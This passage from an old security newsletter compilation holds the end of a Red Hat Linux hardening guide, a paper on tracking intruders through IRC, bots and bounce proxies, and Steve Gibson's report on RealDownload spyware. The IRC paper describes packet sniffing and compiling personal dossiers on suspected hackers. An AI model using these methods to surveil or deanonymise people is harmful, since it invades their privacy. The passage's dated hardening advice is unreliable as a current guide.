(i.e. harder to mess up :). Edit /etc/inetd.conf as follows to ensure full logging of all FTP sessions. ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -L -i -o --- From the man pages --- If the -l option is specified, each ftp session is logged in the syslog If the -L flag is used, command logging will be on by default as soon as the ftp server is invoked. This will cause the server to log all USER commands, which if a user accidentally enters a password for that command instead of the username, will cause passwords to be logged via syslog. If the -i option is specified, files received by the ftpd(8) server will be logged to the xferlog(5). If the -o option is specified, files transmitted by the ftpd(8) server will be logged to the xferlog(5). --- snip snip --- Next comes tweaking. This involves various file administration. The first thing we want to do is secure our /etc/passwd file (this is the database file that holds your user accounts and passwords). First, we want to ensure our system is using /etc/shadow, this securely stores everyone's password as hashes in a file only root can access. This protects your passwords from being easily accessed and cracked (one of the first exploits a hacker looks for). The use of shadow passwords is default as of RH 6.0, however it never hurts to be sure. All you have to do is type the following command as root. This automatically converts your passwords to the /etc/shadow file. Of all the actions you can take to secure your system, I consider this to be one of the most important. pwconv The second step is to remove most of the default system accounts in /etc/passwd. Linux provides these accounts for various system activities which you may not need. If you do not need the accounts, remove them. The more accounts you have, the easier it is to access your system. An example is the "news" account. If you are not running nntp, a news group server, you do not need the account (be sure to update /etc/cron.hourly, as this looks for the user "news"). Also, make sure you remove the "ftp" account, as this is the account used for anonymous ftp. From the man pages. man ftpd: Ftpd authenticates users according to four rules. 4) If the user name is ``anonymous'' or ``ftp'', an anonymous ftp account must be pre-sent in the password file (user ``ftp''). In this case the user is allowed to log in by specifying any password (by convention this is given as the client host's name). For an example of my /etc/passwd file, check out example C. We also want to modify the file /etc/ftpusers (example D). Any account listed in this file cannot ftp to the system. This restricts common system accounts, such as root or bin, from attempting ftp sessions. Linux has the file by default. Ensure that root stays in this file, you never want root to be able to ftp to this system. Ensure that any accounts that need to ftp to the box are NOT in the file /etc/ftpusers. Also, ensure that root cannot telnet to the system. This forces users to login to the system as themselves and then su to root. The file /etc/securetty lists what ttys root can connect to. List only tty1, tty2, etc in this file, this restricts root logins to local access only. ttyp1, ttyp2, are pseudo terminals, they allow root to telnet to the system remotely (example E). Last, create the file /etc/issue. This file is an ASCII text banner that appears for all telnet logins (example B). This legal warning will appear whenever someone attempts to login to your system. If you want to continue using the same /etc/issue file, you will have to modify /etc/rc.d/init.d/S99local. By default, Linux creates a new /etc/issue file on every reboot. Connecting to your server For those of you who will be doing remote administration, it is critical that you develop a secured, controlled way to connect to the server. Often, you need remote access to your server for administration or the uploading of files, these communications need to be secured I will discuss two options here, ssh and TCP Wrappers. I prefer ssh, as it encrypts all communication between you and the firewall. TCP Wrappers will NOT protect your network traffic from sniffing. Users can still capture all of your keystrokes (including passwords) on the network. If you are concerned about users capturing communications to your firewall, I recommend you replace telnet/ftp with ssh. ssh will encrypt all communications to your server, allowing you both to upload files and administer the server in a secure manner. ssh is similar to TCP wrappers in that it has its own layer of logging, and can limit what systems can connect to it. For more information on ssh, you can find ssh here, including source for both ssh clients and server daemon. I recommend you use ssh version 1.2.x, as version 2.x has a limiting license. Another ssh option is Openssh. TCP Wrappers, while it does not encrypt, it does log and control who can access your system. It is a binary that wraps itself around inetd services, such as telnet or ftp. With TCP Wrappers, the system launches the wrapper for inetd connections, logs all attempts and then verifies the attempt against a access control list. If the connection is permitted, TCP Wrappers hands the connection to the proper binary, such as telnet. If the connection is rejected by the access control list, then the connection is dropped. Fortunately for us Linux users, TCP Wrappers is already installed, the only thing left for us to do is edit the /etc/hosts.allow and /etc/hosts.deny file. These files determine who can and cannot access our systems. Also, TCP Wrappers allows us to do fancy things, such as banners or spawn additional programs, such as safe_finger. The syntax is relatively simple. Put the IP address or networks in /etc/hosts.allow that you want to permit connections from. Put IP addresses or networks in /etc/hosts.deny that you do not want to permit access. By default, Linux allows connections from everyone, so you will need to modify these files. 2 recommendations when working with TCP Wrappers. 1.Use IP addresses instead of system or domain names. 2.Set up /etc/hosts.deny to deny everything (ALL), then permit only specific sites with /etc/hosts.allow. For examples on how to setup /etc/hosts.allow and /etc/hosts.deny, see example F. For more ideas on how to use TCPWrappers, check out Intrusion Detection. For the Truly Paranoid I consider the measures discussed above absolutely essential. By following these steps, you have greatly improved your system's security, congratulations! Unfortunately, your system is not 100% secure, nor will it ever be. So, for the truly paranoid, I have added some additional steps you can take. First we will create the wheel group. The wheel group is a group of select individuals that can execute powerful commands, such as /bin/su. By limiting the people that can access these commands, you enhance the system security. To create the group, vi the file /etc/group, create the group wheel, and add the system admins to the group. Then identify critical system binaries, such as /bin/su. Change the group ownership to wheel, and the permissions to owner and group executable only (be sure to maintain the suid or guid bit for specific binaries). For /bin/su, the commands would be: /bin/chgrp wheel /bin/su /bin/chmod 4750 /bin/su Second, we will lock down the files .rhosts, .netrc, and /etc/hosts.equiv. The r commands use these files to access systems. To lock them down, touch the files, then change the permissions to zero, locking them down. This way no one can create or alter the files. For example, /bin/touch /root/.rhosts /root/.netrc /etc/hosts.equiv /bin/chmod 0 /root/.rhosts /root/.netrc /etc/hosts.equiv Third, we configure /etc/shadow to use MD5 hashes instead of the crypt(3) function. This makes the encrypted password file far more difficult to crack. This is done by modifying the PAM modules. PAM (Pluggable Authentication Modules) is a suite of shared libraries that enable you to choose how applications authenticate users. To learn more about PAM, check out ftp://ftp.us.kernel.org/pub/linux/libs/pam/Linux-PAM-html/pam.html. In the old days, you had to manually modify the PAM modules to use MD5 hashes. However, with Red Hat 6.0 or greater, you can select MD5 hashes with the setup utility. Just type "setup" at the command prompt, then select "authentication configuration". From there, you can choose to use MD5 hashes. However, the MD5 hashes will not take effect until the user re-enters their password. For those of you who do not have the setup utility (or have Red Hat 5.2 or earlier), you can still modify the PAM modules manually (example G). For us bash users, I'm not a big fan of the .bash_history file. I do not want people (including root) to know my command history. So, in my .bash_profile, I export the following entry: HISTFILESIZE=0 This means that nothing will be logged to my .bash_history file. I will still have keystroke history and recall, the HISTSIZE env variable, but command history will not be written to the .bash_history file. Last thing we can do is protect our system from physical access. This mainly consists of setting up a password for our BIOS. Also, you can password protect your system during boot-up by configuring /etc/lilo.conf with a password (password=xxx) where xxx is your password. However, keep in mind, once someone has physical access to your system, there is no guaranteed way to protect it. IPChains No discussion about Linux security would be complete without covering IPChains. IPChains is packet filtering software that comes with the 2.2.x kernel and above. This means if you are running Red Hat 6.0 or later, you have it as part of your Linux installation kit. IPChains is similar to Cisco Access Control Lists, it can control what packets can come in and out of your Linux box. Primarly used as a firewall application, IPChains can also be used to armor your standalone Linux box. To armor a standalone system, I configure IPChains to allow only TCP connections I initiate. If anyone attempts to initate any TCP connections to me, the connection is denied. Since IPChains is not stateful, I do allow all UDP and ICMP connections. Last, I log all denied connections, this lets me know if someone out there is being naughty :) However, I drop but do not log all the broadcat/multicast traffic, as this would quickly fill up the system logs. A simple IPChains configuration to armor a standalone system would look something like this. bash# ipchains -L Chain input (policy DENY): target prot opt source destination ports DENY all ------ 0.0.0.0 anywhere n/a DENY all ------ anywhere 255.255.255.255 n/a DENY all ------ anywhere BASE-ADDRESS.MCAST.NET/8 n/a ACCEPT tcp !y---- anywhere anywhere any -> any ACCEPT udp ----l- anywhere anywhere any -> any ACCEPT icmp ----l- anywhere anywhere any -> any DENY all ----l- anywhere anywhere n/a Chain forward (policy ACCEPT): Chain output (policy ACCEPT): To see the config files for this, see example H. To learn more about using IPChains as a firewall or for a standalone system, check out the IPChains HOWTO. Conclusion We have covered some of the more basic steps involved in armoring a Linux box (Red Hat distribution). The key to a secure system is having the minimal software installed, with protection in layers, such as TCP Wrappers, IPChains, and shadowed passwords. There are many additional steps that can be taken, such as tripwire (monitor changes in system binaries) and swatch (automated log monitoring and alerts). I also recommend that new Linux users check out Bastille Linux, a PERL script that can automatically secure your new Linux system, step by step. Remember, no system is truly 100% secure. However, with the steps outlined above, you greatly reduce the security risks. @HWA 310.0 [IND] Paper: Tracking Hackers On Irc by Theory Group ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://theorygroup.com/Theory/irc.html Tracking Hackers on IRC By: David Brumley [dbrumley@theory group.com] Few hackers are motivated purely by knowledge, science, and curiosity. Hackers continue to break into systems long after they become familiar with the technology. Instead, many continue to hack simply because of the social status it brings. For many, hacking *is* a social activity. Hackers meet online to discuss the latest hacking tools, their hacking conquests, and their personal life. System administrators and security professionals must become familiar with the social culture of hackers dwell in to be truly effective. Internet Relay Chat (IRC) has replaced electronic bulletin boards as the social mecca for internet addicts. Hackers are no expection. Cybersleuths must understand the jargon and tools used in this virtual society. By understanding IRC tools and jargon a cybersleuth can determine the real identity of a hackers from birthplace to current address and telephone number. System logs help administrators and security professionals track down criminals. They are useful evidence that a crime has been commited, but not much else. System logs show how and where the electronic bits came from, but they don't show *who* sent them. To prosecute successfully you must not only show where the intruder came from, but who was physically using the keyboard at that particular time. IRC can be a tool for finding out. For example, even with a full audit trail showing an intruder came from a particular account on a particular ISP, the most you can hope to obtain is billing information for the account. While sometimes sufficient, you still haven't show *who* was using the keyboard at the other end of the connection. The account you traced may have been stolen, set up with false billing information, or shared among several in a household. An IRC savvy administrator, however, may be able to determine the exact identity of the intruder. How? By listening to the hacker on IRC and reviewing configuration information on IRC tools left behind. A hacker bragging about compromising your host is also a full confession when logged. The IRC tools may be configured to always allow particular ISP connections, which may help in pinning down their location. With a little deductive reasoning you can pin down who hacked your machine, what their name is, where they live, and even their favorite corner liquor store. There are litterally dozens of IRC Networks. The most popular are DALnet, EFNet, and Undernet. Each IRC network is composed of hundreds, perhaps thousands, of channels where individuals with similar interests can chat real-time with each other. Channels are dynamic by nature. A channel is created the first time someone enters and destroyed when the last person leaves. The first person in a channel is also the channel operator, known as "chanops", or simply "ops". A channel operator is the super user for the channel: they can invite other users to the channel, set the topic, decide who can talk, and give or take operator status from others on the channel. On some networks, such as DALnet and Undernet, channels can be registered after creation. Registration allows the creator to become a channel operator every time they log on to their channel. Registration assigns ownership of a channel. Many IRC networks, including the ever popular EFNet, don't have channel registration. When you leave a channel, you leave all your privileges in that channel as well. You must be re-op'ed every time you join the channel. Hackers love dynamic networks like these because it allows them to take over channels. Hackers will force all legitimate users out of a channel until they are all that is left. When they are the only ones in the channel, they can op themselves. The primary method for forcing users off of a channel are Denial of Service (DoS) attacks. If the victims computer is swamped by a DoS, it will time out and disconnect from IRC. Hackers who participate in these dynamic IRC networks have one primary goal: to keep operator status on the channels they frequent. To do this they must protect against others trying to take over their channel, rogue administrators randomly de-oping them, and deal with the inevitable denial of service attack. To solve these problems, hackers have come up with ingenious ways to create redundant connections from multiple hosts to and IRC network. The simplest solution is to run multiple IRC clients, such as ircII or BitchX from several hosts. By running the clients under screen(1), a unix terminal multiplexer, they can detach IRC sessions into the background and reattach to them later. Each session corresponds to one nickname on the IRC network. If one host goes down, he can always re-attach to a running session on another machine. Since each nickname has operator status, the whole scheme is redundant. It is up to the intruder, however, to maintain daily every IRC session on every host - a very labor intesive activity. IRC 'bots', short for robot, solve the problem of 'hands-on' administration. The purpose of a bot is to sit on IRC and monitor channels for events. In a very simple sense bots are only automated IRC clients. Running stand alone, a bot will automatically op friends (as specified in the configuration file), enforce bans for channel misuse, and provide some channel misuse control . The true power of bots, however, is their ability to link together to form "botnets". Each bot on a botnet serves as a redundant backup, automatically oping friends and other bots, enforcing channel bans, and ensuring a party line exists. Each bot on the botnet is a node. The botnet administrator appoints a master node, with the rest becoming slaves. The master node is in charge of distributing botnet configuration information with each slave. After initial configuration, the botnet administrator need only change configuration information on the master. The master will then automatically take care of updating all the sub-nodes. To add a bot to the network only a simple and static configuration file that specifies the master is needed. Once the new bot starts up, it will automatically contact the master and pull over the requisite configuration information to become a node on the botnet. The advantage to a hacker is enormous. For each new account or system compromise, the hacker need only upload the actual executable and a simple configuration file. Once started, the new bot automatically downloads all information including current lists of channels, friends, and users. The new bot will also then automatically update every time the configuration on the master is changed. The most famous bot is "eggdrop", available at http://www.eggdrop.net. It serves as a good model for the typical bot. It's configuration file is divided up into three logical sections (sometimes in three separate files, sometimes merged into one): user information, channel information, and bot information. Channel information can be recognized by the "channel add" TCL command. Following the channel name are a list of options to apply to that channel. A sample eggdrop channel file looks like: channel add #myhacker { chanmode "+ismt" dont-idle-kick +userbans +protectops } The chanmode defines what mode the channel should be. In this particular example channel #myhacker is invite only (i), secret (s), moderated so that only channel operators can talk (m), and only channel operators can change topics (t). The last three items define eggdrop configuration variables. Entries that begin with a plus (+) will enable options, entries that begin with a minus (-) will disable options. Entries will neither a plus or minus simply define a variable, i.e. make it true. In this particular example the bot will not kick idle users from #myhack, it will let user operators (as opposed to other bots on the botnet) ban people, and will automatically re-op de-oped users. For a full list of options, see the example configuration file that comes with the eggdrop distribution. A user entry for an eggdrop bot can consist of four lines. The first line is always contains the nickname, password, and flags of the bot user. The remaining three lines all use the first two characters to identify the type of configuration information. Entries that start with a "-" list user identifier. To a bot, a user's identity is not their nickname, but the username@hostname.domain.zone where they are connecting from. A line that begins with ":" is a botnet configuration entry. It lists HOSTNAME:PORT that the particular bot for that user will listen on. When two bots communicate they use the port on the host listed. Lines that begin with "!!" or "." contain time stamp information on the user. Entries beginning with "!!" are the channel name and time stamp where the user was last seen by the bot. Entries with "." are the modification time of the entry itself. All times are kept in UNIX epoch format. User files often contain dozens of bot users. If you've found an eggdrop configuration file on a compromised host, chances are most of the entries in the file are also compromised hosts or accounts. A quick note to the administrator of each domain explaining that you've found a hacker configuration file that references his domain is appropriate. You can also use the information in creating an MO (Modus Operundi) file for the hacker. People listed in the user file are often friends of the hacker (whom you may see in the future :) or alternate nicknames the hacker may be using. Here's an example of eggdrop user file: eleet lypmjwfp2ee fbs /0 0 0 0 - *!eleet@*.elaine.Stanford.EDU, *!eleet@*.myth.stanford.edu : firebird.stanford.edu:60000 !! 895178133 #stanford . {created 894412528} Hackers often will not connect to IRC directly. By using a variety of hosts a hacker can subvert a ban, trick others into thinking he is someone else, or connect to an IRC server that limits connections. Most often, though, it is to hide his real IP address in case someone is watching them. A "bounce" program reads from one port and writes to another, i.e. a proxy. The most famous bounce programs are BNC and WinGate. Both accept a TCP connection, connect to a destination, and then relay anything from the original connection to the destination. The primary legitimate use for WinGates are SOCKS and TCP proxys to the internet. Although WinGates can be configured to require a password, most are not. When a hacker has access to a wingate he can "bounce" through the wingate server to hide his tracks. BNC, the word "bounce" with the vowels removed, are UNIX based proxy's designed primarily for "bouncing" IRC traffic. While a WinGate can proxy multiple ports, a BNC runs as a daemon listening to only one port. After accepting a connection, they too proxy information read on the original connection to a destination. In addition to simple proxying, the BNC configuration file allows for creating fake ident responses, virtual host configuration, and limiting the number of users who can use the bounce. Since these processes run for extended periods of time, a hacker will often try to hide them from an administrator. If a hacker has superuser access and is skillful he can hide any process from any administrator. Luckily many hackers are sloppy or lazy. Often they will just change the name of the program do be something innocuous. A local favorite seems to be "pine". The hacker runs the process under the new name hoping that the administrator will not notice. Because hackers are adept at hiding process names, you should always be aware of the network connections your host generates. netstat(1m) and lsof (http://vic.cc.purdue.edu/pub/tools/lsof_4.45_W.tar.gz) are good tools for monitoring local network connections. An administrator should also be wary of local processes, such as "./pine" or "./emacs" binding to unusual ports. It's a safe bet that pine doesn't listen to port 6666 and write to irc.erols.com. After you've identified a hacker is on your system, and they appear to be using IRC, consider setting up a network sniffer. (Please make sure you talk to your institutions legal department and are aware of all applicable laws.) Network dumps are valuable because little, if any, IRC activity is encrypted. Even if a hacker uses an encrypted client to log in, such as SSH, the actual connection to the IRC server will most likely be in clear-text. TCPDump (available from ftp://ftp.ee.lbl.gov) is the standard packet sniffer on most Unix hosts. By default it only captures the first few bytes of every transaction: just enough to diagnose routing and network problems. When your interested in logging entire sessions it's important to read all available packet information. With TCPDump, the -s option controls how much data in each packet is collected. Consult your network MTU to determine the optimum setting. We use: # /usr/sbin/tcpdump -n -s 1600 -F -w tcpdump. A quick and easy way to view the dump is to use the Unix command strings(1). If to much information is picked up, you can separate your tcpdump file using: # /usr/sbin/tcpdump -r tcpdump. -w and then run strings again on the output file. For example, if you're only concerned with IRC traffic (which normally is on port 6667), use: # /usr/sbin/tcpdump -r tcpdump. -w irc. dst port 6667 # strings irc. After gathering as much information about the hacker as possible through a packet dump and information from the various IRC configuration files, compile an M.O. (Modus Operundi) file. The M.O. should contain information such as the hacker's preferred nickname and any variations used, any dial-ups used, any related incidents, and any personal information discovered. On several occasions I have picked up the exact age, name, and location of the hacker! This type data is invaluable when contacting law enforcement and correlating various incidents. I've found plotting the information on a map is a good way to provide a quick reference of active hackers. On a slow afternoon I have also been known to go back to the M.O. files and check to see who is on IRC. If I believe I see the same hacker I'll send a quick note to the administrator of the domain, alerting them to a potential problem. Sometimes it turns out to be nothing, but the message is always appreciated. I use ircii (available from http://www.irchelp.org/irchelp/ircii/), the classic UNIX irc client, and primarily connect to EFnet. (Macintosh and PC users should check out http://www.irchelp.org for a list of clients). Generally the unix clients are safe as long as you use common sense. Don't accept files from strangers, don't run untrusted IRC scripts, and never run commands you don't understand. With most clients all IRC commands start with a forward slash ("/"). Everything else is a message sent to the channel. After connecting, the first thing I do is start a log. With ircii, the command is: /set log on The logfile will be named IrcLog. To change names, type: /set logfile To look for a person, use the "who" command: /who -nick (looks for a particular nickname) /who -host (looks for anyone using a particular host) Wildcards are allowed. However users marked as "invisible" will only show if you specify their exact nickname. When checking IRC, be sure to look for all variations of the nickname. Hackers have the habit of logging in from a hacked site on a secondary nickname, while logged in with their primary nickname on their dial-in account. For example, perhaps there is a hacker who goes by the nickname "eleet". Querying IRC for eleet and eleet_ might show: * eleet H* user@ppp-7.isp.net * eleet_ H* root@www.companyname.com Chances are that www.companyname.com has been hacked. Even more interesting is that the person who did it probably, though not certainly as ident responses can be faked, is also using the dialup ppp-7.isp.net. One note of caution: when using IRC use the who command, not whois /who -nick will give you information on the nickname. /whois will give you more information, but also notify the user that someone is querying their nickname. Due to the number of hackers using IRC it is often the target of criticism, but there are thousands of legitimate users who use the IRC networks daily. Like any other community there will always be a criminal element. When hackers do use IRC it allows the administrator to monitor the criminal element and gain insight into their methodologies and habits. The acquisition of this knowledge can help system administrators, law enforcement, and security professionals track and prosecute hackers more effectively. Reference sites: http://www.eggxpress.com - Information on eggdrop, BNC, and BitchX configuration files http://www.eggdrop.net - The home of eggdrop http://www.irchelp.org - Provides introductory documents and tutorials for using IRC http://metalab.unc.edu/dbarberi/papers/chats - Papers about the social perspective of IRC http://www.efnet.net - The popular EFNet, a dynamic IRC network and a favorite of many hackers http://www.undernet.org - The Undernet IRC network. http://www.newnet.net - The NewNET IRC network. http://www.self-evident.org - Dedicated to news on EFnet, including information on hackers and channels they frequent. @HWA 311.0 [IND] More spies in the wires..software that snoops on you and more. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Snarfed from Packetstorm.securify.com URL: grc.com/downloaders.htm Our Site of the Week is The Anatomy of File Download Spyware. "Spyware" is a name given to software which secretly tells its manufacturer your personal information. This page investigates the spyware-like features which come installed with RealNetworks RealDownload, Netscape/AOL Smart Download, and NetZip Download Demon utilities.RealNetworks RealDownload turns out not only to send the URL of the files you download, but the Windows GUID, a unique identifier which includes each computers MAC address. Info from the site: The Anatomy of File Download Spyware by Steve Gibson, Gibson Research Corporation -- 2000/7/14 Page Updated: Wednesday, July 26th, 2000 (only added a link to my telephone appearance on ZDTV.) What do the NetZip-descended file downloaders whisper when they think you are not listening? OVERVIEW: How Does This Affect YOU ? As you will see on the page below, if you use the RealNetworks RealDownload, Netscape/AOL Smart Download, or NetZip Download Demon utilities in their default configuration . . . EVERY TIME you use one of these utilities to download ANY FILE from ANYWHERE on the Internet, the complete "URL address" of the file, along with a UNIQUE ID TAG that has been assigned to YOUR machine, and in the case of Netscape's SmartDownload only YOUR computer's individual Internet IP address, is immediately transmitted to the program's publisher. This allows a database of your entire, personal, file download history to be assembled and uniquely associated with your individual computer . . . for whatever purpose the program's publishers may have today, or tomorrow. VERY IMPORTANT: When I re-examined my findings in the face of RealNetworks' insistence that I was absolutely wrong about my conclusions, I caught something that I had missed before: My exact personal name and private eMail address was being sent back to RealNetworks whenever I downloaded a file. When I confronted RealNetworks with this, they explained that it was due to the fact that I had purchased a product from them in the past, and the "cookie" my system had received during the purchase was being returned to them. That certainly makes file downloads seem far less "anonymous" than RealNetworks continues to allege. (Full details are provided below.) The Saga Unfolds . . . Friday, July 14 I download fresh copies of all three Download Demon-descended file downloading utilities and conduct a series of tests to verify the rumors I've heard about their "phoning home" behavior. In each case, the behavior I examined resulted from each program's "default configuration" which is enabled unless deliberately disabled by the user. I confirmed that all three programs send a report back to their publishers whenever the program is used to download any file through the Internet. This report includes the full URL of the file being downloaded and an "ID Tag" which could be used to uniquely identify the downloading computer. In the case of Netscape's Smart Download, the computer's individual Internet IP address is also sent as a "cookie header" which would tend to defeat IP-masking proxies and anonymizers. Since I was quite alarmed by what I had found and then carefully confirmed, I immediately began notifying the 338,584 members (currently) of my User Managed eMail Notification System and I created a new discussion newsgroup to contain our subsequent public discussion of this issue. Monday, July 17 By Certified Mail I receive RealNetworks' threat letter which I ignore because it's just so much nonsense and proceed to initiate a very constructive dialog with two representatives of RealNetworks. Their V.P. of Government Affairs and Privacy informs me that I am absolutely, totally, and completely mistaken and insists that I immediately take this page down and retract all of my public statements to everyone who has received them. (I guess he must have read Robert Kimball's letter too.) I refuse to remove the page based solely upon his forceful representations and assurances. But I worry in the face of their legal threats that I might somehow have been completely mistaken. So I quickly post a big red notice at the top of this page to notify its readers that RealNetworks is very sure that I am completely wrong, and that I am immediately working to re-verify all of my findings. Then a much more serious RealDownload privacy concern rears its ugly head: It's Monday afternoon, and everything still comes out just the way it did Friday. (In other words, I was right all along.) However, this time I happen to notice that my actual first and last name, and my own private eMail alias address are also being transmitted to RealNetworks as a result of each file download. So I immediately forward the captured packet to the RealNetworks representatives with whom I'm working and ask them what is going on. By phone the technical manager with whom I'm speaking asks if I've ever purchased anything from Real? I explain that a few months ago I purchased "Real Producer" in order to produce streaming content for my web site. So she explains that my purchase and interaction with their eCommerce server left a "cookie" on my computer which included my real name and personal eMail address from the purchase transaction. I see. So now my private information which was obtained by RealNetworks during a SECURE PURCHASE TRANSACTION with an explicit commitment for security, privacy, and secrecy is being sent back to Real months later "in the clear" with no security, every time I download arbitrary files from the Internet using their utility along with the full name of the file I downloaded and the unique ID that could be used to identify my computer. I think that's a "Real" problem. And it would certainly seem to contradict RealNetworks' repeated statements that it is not possible for them to associate my use of RealDownload with any personally identifiable information. If my name and private eMail address aren't "personally identifiable information", what is? Moreover, that personal information could be easily associated with the file download which directly triggered the transmission of that information. Based upon my understanding of how and why this happens, this is easily reproducible and is apparently going on all the time with RealNetworks customers . . . like right now. If what I've been told by the RealNetworks technical manager is true and it certainly fits the facts and logic it appears that anyone who has purchased a RealNetworks product through their eCommerce system receives an insecure, plaintext, cookie containing their actual name and eMail address. I certainly did. And this cookie is then sent back to RealNetworks . . . . . . even in situations where users of RealNetworks' products have been repeatedly and even forcefully assured of their absolute anonymity. Whoops. On a Technical Point: RealNetworks has stated repeatedly that they care about their user's privacy. And they tell us that they are "the leader in the delivery of Internet media." Monday they told me that they employ 400 programmers. With all that, wouldn't you be inclined to presume that they had a grasp on Internet Technology? If they care about our privacy, why are they storing my real name and private eMail address from an eCommerce transaction as "plain text" in a cookie, and sending it out without any security whatsoever? Even if it weren't being sent back due to a file download it would still be a significant privacy concern. Why not, instead, use a cookie the way it was intended to be used? A cookie should be an "opaque token"; an apparently meaningless string of characters, which only has meaning to the entity which created it. But none of that was the problem I was facing at the moment. (Perhaps we'll deal with that one next.) I was working to demonstrate to the RealNetworks representatives the absolute truth of what I'd been saying about the transmission of a system-unique ID. So, using RealDownload, I downloaded three different files over the course of several hours and from different Internet servers. I captured each resulting 'downloadid' as it was leaving my computer on its way to RealNetworks: downloadid=9B1450495BF211D4A025002018252799 * downloadid=9B14504A5BF211D4A025002018252799 * downloadid=9B14504B5BF211D4A025002018252799 As you can see, they differ by a single character, and that character is changing from "9" to "A" to "B" which indicates standard hexadecimal counting. So I sent these 'downloadids' to the RealNetwork representatives. This apparently puzzled Real's technical manager who said that she'd have to get back to me on it. When she called back she explained that, sure enough, they had succeeded in duplicating the same behavior in their labs and . . . that it must be a bug. A "bug"?? Yeah . . . okay . . . I guess that would be a big one? She explained that she had just learned that the last 24 characters of the "downloadid"'s 32-characters, were derived from a Windows GUID. "GUID" stands for "Globally Unique IDentifier" and is a technology standard specified by the Open Software Foundation (OSF) to create unique and non-repeating "ID Tags". Such "ID Tags" are generated once then stored, typically in the Windows Registry. If you're really curious, use the Windows "RegEdit" program to look under this key name: HKEY_CLASSES_ROOT\CLSID and you'll see a billion GUID's (Don't change anything!) In the past, the use of GUID's has aroused the wrath and concern of privacy advocates the world over, since they are like "serial numbers" which can be used to uniquely identify software users. Okay. So now we know how and where RealNetworks gets the last 24-characters of their 'downloadid'. It is a non-changing unique identifier, different for every computer. Today, they may not like the fact that their use of a deliberately unique and fixed identifier has severe privacy overtones, nor that they have been caught in an outright lie about their use of an identifier which is being transmitted and could be used to track the software download habits of their RealDownload users. But I never expected that forcing them to publicly confess the truth would make them particularly happy. downloadid=9B145049 / 5BF211D4A025002018252799 It appears to be quite likely that the first eight characters are a hexadecimal representation of a 32-bit binary quantity that is incremented for every download that, in any event, is the behavior I witnessed. So the first portion which appears to be incremented for each download functions like a "download session ID". Whereas the last 24 characters are exactly what I have always asserted: A "download machine ID." Together, they create a deliberately concocted, unique identifier, which, when transmitted from any user's computer could be used to track their users' download behavior over time and to assemble a download profiling database. Tuesday, July 18 Things were much quieter today. I was told that RealNetworks staff was "in meetings" most of the day. Then, at the end of this long day of "meetings" which were apparently spent carefully wording the following document RealNetworks produced this formal statement: REALNETWORKS PRIVACY STATEMENT 7/18/00 In response to recent questions regarding certain technical functions of its RealDownload product, RealNetworks today issued the following statement: "We emphatically disagree with the implications raised by certain members of the technical community about the behavior or planned behavior of RealDownload. To be clear: RealDownload does not transmit personally identifiable user information to RealNetworks without informed consent. It does not monitor users’ behavior and it does not log download URL information. Because we do not log download URL information and the product does not transmit registration information identifying the RealDownload user, we cannot and do not store download URLs with personal information and we never have. "We work very hard to ensure that our products comply with all of our privacy policies. We have even taken the extra step of hiring Arthur Andersen to independently review our compliance with our own strict privacy policies. Through its eSure audit program, Arthur Andersen has independently verified that RealNetworks does not store URLs transmitted from the RealDownload product. "Because of the way RealDownload interoperates with the APIs of certain versions of the Windows operating system, it creates for each download a new, 32-character code that does not contain any personal information, but apparently does not fully randomize during each download. Now that we are aware of this technical issue, and because the 32-character code serves no purpose, we are removing it from forthcoming versions of RealDownload. "As the leader in the delivery of Internet media, we at RealNetworks set for ourselves and will adhere to the highest privacy standards. We appreciate the ongoing diligence of privacy experts and we will continue to develop RealNetworks products in a manner that respects customers’ privacy." Tuesday Evening . . . July 18 ZDTV's Leo Laporte and I discuss the current situation on Leo's ScreenSavers show. Are you being watched when you download? Wednesday, July 19 Regarding RealNetworks' Statement: Since I am in the hot seat here, being the "certain members of the technical community" who has "raised implications", the world will be looking for my reaction to this statement from RealNetworks. I received their statement first from RealNetworks directly, then subsequently from several members of the media. Everyone has wanted my reaction. Here it is: I am unconcerned and unimpressed with most of RealNetworks' Statement. They specifically failed to address the reason for the presence of the "insufficiently random" 32-character code whose very existence they had previously denied emphatically. I am, however, pleased to learn that they have decided that it now "serves no purpose" and will forthwith be removed from the product. The sooner the better for everyone involved. We are still left with what is, arguably, a much bigger problem: The undeniable transmission of personal and private "personally identifiable" information as a direct consequence of the use of RealDownload. See the full technical 'dissection' below . . . Thursday, July 20 Everything I hear from RealNetworks indicates that they are taking every issue I have raised on this page very seriously . . . and not just paying them lip-service, but really doing something quickly: I am told but have not yet verified that the opportunity for the significant "personally identifiable" information leakage has already been fixed. That's got to be a record I only published my discovery of it this morning! WHOOPS! Spoke too soon. NOT FIXED as of end of day Friday! As I detail below, the potential breach arose from RealDownload images being served from the eCommerce site's domain, thus exposing an eCommerce derived cookie during a RealDownload transaction. But since the image URL's were being provided on-the-fly by the RealDownload server, their source server could be changed with no change to the product. By serving the RealDownload images from the RealDownload (non-commerce) server, eCommerce cookie disclosures will no longer be triggered. Tomorrow I will verify that this is, in fact, now happening. We are still left with the problem of RealNetworks' storage and transmission "in plaintext form" of information which was received by them over a secure connection. I will publish an analysis and discussion of this issue tomorrow. I am told that RealNetworks may release a new version of RealDownload tomorrow . . . thus breaking another retooling speed record. So we might soon have a new version of RealDownload that does not, and can not send unique "per-computer" identifiers back to RealNetworks' servers. Any Internet server is typically able to determine the Internet (IP) address of a connected client such as the user's computer when it sends a file download report. That's how my own 'ShieldsUp' security testing system operates. Therefore, RealDownload users who are extremely security conscious, and who have non-dynamic IP addresses (most non-dial up users) may still desire to disable RealDownload's "per file" reporting function so that all "per-download" reporting is disabled. We'll see what tomorrow brings. Things are looking up. Friday, July 21 July 21 RealNetworks Inc. admitted today its RealDownload software could be used to track specific users’ exact download habits. http://www.msnbc.com/news/436070.asp My determination to dig out the WHOLE truth takes an unexpected turn today. Curious about the fact that the size of a full Windows GUID is exactly the same as the size of RealNetworks' infamous 'downloadid', I write my own little program to request GUIDs from the Windows operating environment. Running this program three times on the same computer which performed Monday's results, generates the following three GUIDs: Three Successive Windows GUIDs WITHOUT reboots GUID = CCDE2D405EF811D4A025002018252799 GUID = CCDE2D415EF811D4A025002018252799 GUID = CCDE2D425EF811D4A025002018252799 Notice that, EXACTLY like the three successive downloadids generated by RealDownload on Monday, these GUIDs differ from each other in exactly one character, that this character is counting, and most significantly, the LAST 20 CHARACTERS of the GUIDs I generated exactly match the tail of the 'downloadid': GUID = CCDE2D405EF8 11D4A025002018252799 